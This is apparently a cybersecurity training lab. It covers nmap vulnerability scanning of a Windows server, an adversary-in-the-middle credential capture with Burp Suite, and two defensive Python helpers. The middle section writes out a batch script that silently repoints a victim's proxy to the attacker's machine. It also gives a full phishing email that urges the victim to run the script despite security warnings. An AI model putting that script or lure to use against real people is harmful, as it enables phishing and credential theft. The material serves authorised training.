Lab - Using Nontraditional Vulnerability Scanning Tools
Scenario
In this lab, you will run vulnerability scans using nmap, detect exploitable issues with Burp Suite, and review the results of the nmap scan.
The focus of this lab is the tools not traditionally considered vulnerability scanners, but which can absolutely detect and identify vulnerabilities.
As a cybersecurity analyst, you are working to discover weaknesses and vulnerabilities that your organization, Structureality Inc., needs to mitigate throughout its internal network. This lab focuses on finding weaknesses in a target server with nmap and discovering insecure protocols using Burp Suite.
Your cybersecurity analyst (CySA) workstation, running Kali Linux, is located in Structureality’s server subnet.
Understand your environment
You will be working from a virtual machine named KALI hosting Kali Linux connected to the vLAN_SERVERS subnet. You will be performing vulnerability scans against a Windows 2016 Server named MS10. You will also be working against a website at juiceshop.local hosted within the company’s screened subnet.
Perform a vulnerability scan using nmap
There are over 600 NSE (nmap scripting engine) scripts available to use with nmap. Most of these are grouped into categories to make running them against targets easier. One of these categories is vuln (i.e., vulnerabilities), which has over 100 scripts that attempt to discover vulnerabilities in a target. In this exercise you will run these scripts against a Windows Server 2016 system.
- Use:
nmap 10.1.16.2 --script=vuln -vv -sC -sV -O -oN ms10-vuln-scan.txt
This nmap command will perform several operations against the 10.1.16.2 (MS10) target. This includes a default SYN scan against the top 1000 TCP ports in addition to the following explicit functions:
- The “--script=vuln” parameter runs the set of NSE (nmap scripting engine) scripts in the vuln (i.e., vulnerabilities) category.
- The “-vv” parameter sets the output to maximum verbosity.
- The “-sC” parameter runs the default script scan, which is the set of NSE scripts in the default category.
- The “-sV” parameter performs a version scan, which attempts to elicit the identity of services on open ports.
- The “-O” parameter attempts to identify the operating system.
- The “-oN” parameter saves the output of nmap to the specified filename (in addition to the screen display of the same).
Intercept web credentials
In this exercise, you will perform an adversary in the middle (AitM) attack so you can intercept web communications. The goal is to determine if web credentials can be stolen via a social engineering attack. This will reveal whether insecure protocols are in use in the network as well as if users are vulnerable to forms of social engineering.
- Burp Suite needs to be configured to perform Proxy without intercept. Start by selecting the Kali Applications menu from the top taskbar. It is to the far left and looks like a stylized white dragon on a blue square.
- Another Burp Suite Community Edition pop-up window is displayed welcoming you to the Burp Suite Community Edition. Select Temporary project, then select Next.
- On the Select the configuration that you would like to load for this project page, select Use Burp defaults, then select Start Burp.
- Select the Proxy tab in the Burp Suite window.
- On the Proxy tab, select the Options sub-tab.
- In the top section, under the heading Proxy Listeners, select Add.
- On the Add a new proxy listener window, enter 8080 in the Bind to port: field.
- Select Specific address, then select 10.1.16.66 in the pull-down list, then select OK.
- Select the Intercept sub-tab of the Proxy tab.
- Confirm that the middle button near the top of the sub-tab is showing Intercept is off.
- Select the HTTP history sub-tab of the Proxy tab.
Next, you need to prepare an attack script and social engineering attack to trick the victim into using your Kali system as their proxy.
- Open a new Terminal window by selecting the Terminal Emulator from the Kali Linux toolbar.
- Enter vim /var/www/html/newproxy.bat
  - This command will open VIM and create a new file named newproxy.bat. This new file is saved in the /var/www/html directory, which is the web root for the local Apache web server.
- Type i to enter insert mode. The message -- INSERT -- should be present at the bottom of the screen.
- Type the following into the empty document area of VIM:
  - Be sure to create a final blank new line.
@echo off
PowerShell Set-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\'Internet Settings' -Name ProxyServer -Value 10.1.16.66:8080
PowerShell Set-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\'Internet Settings' -Name ProxyEnable -Value 1
- Once finished, press ESC to exit insert mode.
- Enter :wq to save and quit VIM.
- Enter service apache2 start
  - This command starts the preexisting Apache2 installation within Kali.
- Minimize the Terminal window.
At this point, you are ready to exploit the victim. The scenario is that you, as the attacker, send the jaime@structureality.com account the following email message:
Dear 515Support customer,
Due to recent equipment changes, there is a need to alter the configuration of your system's proxy settings. Please follow the link below to access an auto-configuration script that will download and apply the necessary changes to your system.
http://10.1.16.66/newproxy.bat
Once you have downloaded this file, execute it. Your system may warn you that this is an unknown program. Don't worry about that. Just agree to allow it to run it anyway. Our in-house security team wrote this tool, and it is safe to run.
Once the change is made, you are invited to visit the local Juice Shop, where you will receive a free juice on us. We have already set up the discount code by creating an account with your username and password. So, visit juiceshop.local, then log in to obtain your free juice!
Sincerely, 515Support
Info
This exercise assumes the social engineering phishing message has been sent to the victim.
You will temporarily play the part of the victim.
- Select the MS10 VM.
- Minimize or close Server Manager if it appears. It will not be used in this lab.
- Open Firefox.
- In the Firefox address bar, enter http://10.1.16.66/newproxy.bat
- The download should happen quickly. The Firefox Downloads window should be displayed. Select newproxy.bat from the Downloads window.
- A pop-up window appears asking whether to open the file; select OK.
- A Security Warning pop-up window appears; select Run.
Info
At this point, the victim’s proxy settings are now changed to use the attacker’s computer (i.e., Kali) as its proxy server.
- Close Firefox.
- Now you want to claim your free juice! Start Firefox again and then in the address bar, enter juiceshop.local
- If a Welcome to OWASP Juice Shop pop-up appears, select Dismiss.
- Select Account in the top-right area of the web page, then select Login.
- Since the email claimed you have an established account using your local credentials, type jaime@structureality.com in the Email field and type Pa$$w0rd in the Password field, then select Log in.
- This login attempt will fail. You will see the message Invalid email or password.
- Switch back to the KALI virtual machine and, if needed, sign in as root using Pa$$w0rd as the password.
- The Burp Suite interface should still be open to the HTTP history sub-tab.
You need to find the last communication from the victim to the Juice Shop host of http://juiceshop.local. The communication you are looking for should have the following parameters:
Method: POST
URL: /rest/user/login
Params: (checkmark)
Status: 401
MIME type: text
There will be other captured communications besides the victim’s visit to the Juice Shop website. So, it may take some effort to locate the specific communication.
- Select the MIME type column to sort by that value. If the column looks empty, select it again: you want the sort order inverted so that communications with MIME type “text” are at the top.
- This should leave a small number of MIME type text communications sorted to the top.
- Look at each until you see the one which matches the needed parameters, then select it.
- The contents of the selected message are shown in the bottom left pane of Burp Suite.
- You should see the following at the bottom of the communication:
"email":"jaime@structureality.com",
"password":"Pa$$w0rd"
You have now phished (i.e., stolen) the victim’s credentials using a social engineering attack. The attack procedure was first to change the victim’s system settings to use the attacker’s system as a proxy. Then by tricking them into visiting a website and attempting to authenticate, you have obtained their credentials.
This exercise has demonstrated that traffic carried over insecure protocols can be intercepted in transit by listening devices. This exercise uses an AitM approach, but a sniffing approach may be just as effective. This issue should be reported along with a recommendation that all protocols be upgraded to their encrypted forms.
- Close Burp Suite; select Yes to confirm closing.
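What the analyst did by hand in the HTTP history, an audit script can do across the whole capture, and that list of hosts is the evidence behind the recommendation above. The following is an added example written for this page, not lab material and not Burp Suite code: it reads raw requests as a forward proxy sees them, flags every request that carried credentials over cleartext HTTP, and skips CONNECT tunnels because an HTTPS visit is opaque to the proxy. It goes slightly beyond the lab by also catching HTTP Basic authentication, which is only base64 and therefore just as exposed. The capture is constructed; the intranet.example host, its field names and the Basic-auth value are invented for the example. Findings report which field was exposed and never the value itself.

```python
"""Audit a proxy's HTTP history for credentials submitted over cleartext HTTP."""
import json
from urllib.parse import parse_qsl, urlsplit

# Constructed sample of what a forward proxy's HTTP history holds: request line
# with an absolute URI, headers, blank line, body. Not a real capture; the
# intranet.example host and its values are invented for this example.
SAMPLE_CAPTURE = [
    "POST http://juiceshop.local/rest/user/login HTTP/1.1\r\n"
    "Host: juiceshop.local\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"email":"jaime@structureality.com","password":"Pa$$w0rd"}',
    "GET http://juiceshop.local/rest/products/search?q=apple HTTP/1.1\r\n"
    "Host: juiceshop.local\r\n"
    "\r\n",
    "POST http://intranet.example/login HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "username=jaime&passwd=hunter2&remember=1",
    # A CONNECT tunnel is what an HTTPS visit looks like to the proxy: the
    # body is encrypted end to end, so nothing inside it can be inspected.
    "CONNECT juiceshop.local:443 HTTP/1.1\r\n"
    "Host: juiceshop.local:443\r\n"
    "\r\n",
    # HTTP Basic auth is only base64, so over plain HTTP it is cleartext too.
    "GET http://intranet.example/reports HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "Authorization: Basic dXNlcjpwYXNz\r\n"
    "\r\n",
]

# Field names that normally carry a secret; extend for the applications you own.
CRED_FIELDS = {"password", "passwd", "pwd", "pass", "secret", "token"}


def parse_request(raw):
    """Split one raw HTTP request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def credential_fields(body, content_type):
    """Names of credential-looking fields in a JSON or form body. Values are never returned."""
    fields = {}
    if "json" in content_type:
        try:
            data = json.loads(body)
        except ValueError:
            return []
        if isinstance(data, dict):
            fields = data
    elif "x-www-form-urlencoded" in content_type:
        fields = dict(parse_qsl(body))
    return sorted(name for name in fields if name.lower() in CRED_FIELDS)


def audit_capture(requests):
    """Return one finding per request that carried credentials over cleartext HTTP."""
    findings = []
    for raw in requests:
        req = parse_request(raw)
        if req["method"] == "CONNECT":
            continue  # TLS tunnel: contents are not visible to the proxy
        url = urlsplit(req["target"])
        if url.scheme != "http":
            continue
        exposed = credential_fields(req["body"], req["headers"].get("content-type", ""))
        if req["headers"].get("authorization", "").lower().startswith("basic "):
            exposed.append("Authorization: Basic")
        if exposed:
            findings.append({"method": req["method"], "host": url.netloc,
                             "path": url.path, "exposed": exposed})
    return findings


def remediation_targets(findings):
    """Hosts that still accept credentials over HTTP and need to move to HTTPS."""
    return sorted({f["host"] for f in findings})


if __name__ == "__main__":
    found = audit_capture(SAMPLE_CAPTURE)
    for f in found:
        print(f"{f['method']} http://{f['host']}{f['path']} exposes {', '.join(f['exposed'])}")
    print("Upgrade to HTTPS:", ", ".join(remediation_targets(found)))
```

The output of remediation_targets is the list to hand to the security team with the report: each host on it accepted a credential in the clear, which is exactly the condition the AitM proxy (or a passive sniffer on the same segment) exploits.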
Review the nmap scan results
Now that the nmap vuln scan has completed, you need to review the results. The goal of reviewing any vulnerability report is to determine the issues that need to be mitigated by the security team.
- Connect to the KALI VM.
- Return to the Terminal window where nmap was executed in the first exercise.
- The target’s nmap vulnerability scan should have completed.
- Rather than scrolling back up through the terminal, view the results from the output file. Enter less ms10-vuln-scan.txt to open the nmap scan output file in the less viewing utility.
- Read over the results.
  - Identify the operating system of the target.
- After you have reviewed the nmap output file and answered the previous questions, type q to exit the less viewer.
When reviewing the output of any security tool or vulnerability scanner, it is important to keep several issues in mind. First, you need to validate or verify vulnerabilities before initiating mitigations. False positive items do not need to be resolved, only true positive issues. Second, you need to prioritize the verified issues. This provides guidance to the security team as to the order and urgency to address the reported problems. Finally, you should make recommendations on responses or remedies when known. As a cybersecurity analyst, you may often know how to resolve specific problems you discover. Passing this information along to the security team can make their response to vulnerabilities more efficient.
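The three steps in the paragraph above (validate, prioritize, recommend) start with getting the scanner's findings into a form you can work through. The following is an added example written for this page, not lab material and not an nmap tool: it parses the normal-output file that -oN writes, pulls out the host, OS guess, open ports and every vuln-script result, and orders the results so that confirmed findings come first, checks that failed to run are flagged for a re-test rather than silently dropped, and NOT VULNERABLE results are set aside instead of being sent for mitigation. The report text inside it is constructed to follow nmap's layout; the script names, finding titles and the CVE id are placeholders, not findings from MS10. The state strings it ranks (VULNERABLE, LIKELY VULNERABLE, NOT VULNERABLE, ERROR) are the ones NSE's vulns library prints.

```python
"""Triage helper for nmap normal output (-oN) from a --script=vuln run."""
import re

# Constructed sample in nmap's normal-output layout. It is NOT real output from
# MS10: the script names, finding titles and the CVE id are placeholders.
SAMPLE_REPORT = """\
Nmap scan report for 10.1.16.2
PORT     STATE SERVICE       REASON          VERSION
80/tcp   open  http          syn-ack ttl 128 Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-example-vuln-check:
|   VULNERABLE:
|   Placeholder web server weakness (constructed)
|     State: VULNERABLE
|     IDs:  CVE:CVE-XXXX-XXXX
|_    Risk factor: High
445/tcp  open  microsoft-ds  syn-ack ttl 128 Microsoft Windows Server 2016 microsoft-ds
|_smb-example-vuln-check: ERROR: Script execution failed (use -d to debug)
OS details: Microsoft Windows Server 2016
Host script results:
| smb-host-example-check:
|   NOT VULNERABLE:
|   Placeholder host-level weakness (constructed)
|     State: NOT VULNERABLE
|_    Risk factor: Medium
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
OS_RE = re.compile(r"^OS details:\s*(.+?)\s*$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|(?:_| )([\w.-]+):\s*(.*)$")  # first line of a script block
STATE_RE = re.compile(r"^\|_?\s+State:\s*(.+?)\s*$")     # vulns-library state line
RISK_RE = re.compile(r"^\|_?\s+Risk factor:\s*(\S+)")
IDS_RE = re.compile(r"^\|_?\s+IDs:\s*(.+?)\s*$")
RISK_RANK = {"high": 0, "medium": 1, "low": 2}


def _finding(script, scope, head, body):
    """One '| script:' block -> finding dict, or None when the script reports no vuln state."""
    f = {"script": script, "scope": scope, "state": "", "risk": "", "ids": ""}
    if head.startswith("ERROR"):  # generic NSE failure on the first line: the check never ran
        f["state"] = "ERROR"
    for raw in body:
        for key, regex in (("state", STATE_RE), ("risk", RISK_RE), ("ids", IDS_RE)):
            if (m := regex.match(raw)):
                f[key] = m.group(1)
    return f if f["state"] else None


def parse_nmap_normal(text):
    """Parse host, OS guess, port table and vuln-script blocks out of -oN text."""
    report = {"host": "", "os": "", "ports": [], "findings": []}
    scope, block = "host", None  # block = [script, scope, first-line text, following lines]

    def close():
        nonlocal block
        if block and (f := _finding(*block)):
            report["findings"].append(f)
        block = None

    for line in text.splitlines():
        if (m := HOST_RE.match(line)):
            report["host"] = m.group(1)
        elif (m := OS_RE.match(line)):
            report["os"] = m.group(1)
        elif (m := PORT_RE.match(line)):  # new port: following script blocks belong to it
            close()
            scope = f"{m.group(1)}/{m.group(2)}"
            report["ports"].append({"port": scope, "state": m.group(3),
                                    "service": m.group(4), "detail": m.group(5)})
        elif line.startswith("Host script results"):
            close()
            scope = "host"
        elif (m := SCRIPT_RE.match(line)):
            close()
            block = [m.group(1), scope, m.group(2), []]
        elif line.startswith("|") and block:
            block[3].append(line)
        else:
            close()
    close()
    return report


def state_rank(state):
    """0 = confirmed, 1 = likely, 2 = check did not run (re-test), 3 = not vulnerable."""
    for rank, prefix in ((0, "VULNERABLE"), (1, "LIKELY"), (3, "NOT VULNERABLE")):
        if state.upper().startswith(prefix):
            return rank
    return 2


def bucket(finding):
    return ("verify_then_mitigate", "verify_then_mitigate", "retest", "not_vulnerable")[state_rank(finding["state"])]


def triage(report):
    """Findings in the order an analyst should work them: state first, then stated risk."""
    return sorted(report["findings"],
                  key=lambda f: (state_rank(f["state"]), RISK_RANK.get(f["risk"].lower(), 3), f["scope"]))


if __name__ == "__main__":
    rep = parse_nmap_normal(SAMPLE_REPORT)
    print(f"{rep['host']} ({rep['os']}), open: {[p['port'] for p in rep['ports']]}")
    for f in triage(rep):
        print(f"[{bucket(f)}] {f['scope']:>8} {f['script']}: {f['state']} risk={f['risk'] or '?'} {f['ids']}")
```

Against the real file the call is parse_nmap_normal(open("ms10-vuln-scan.txt").read()). The ranking uses only what the scanner printed, so the verify_then_mitigate bucket is a worklist to validate by hand, not a confirmed list; the retest bucket matters because a script that errored out tells you nothing about whether the host is vulnerable.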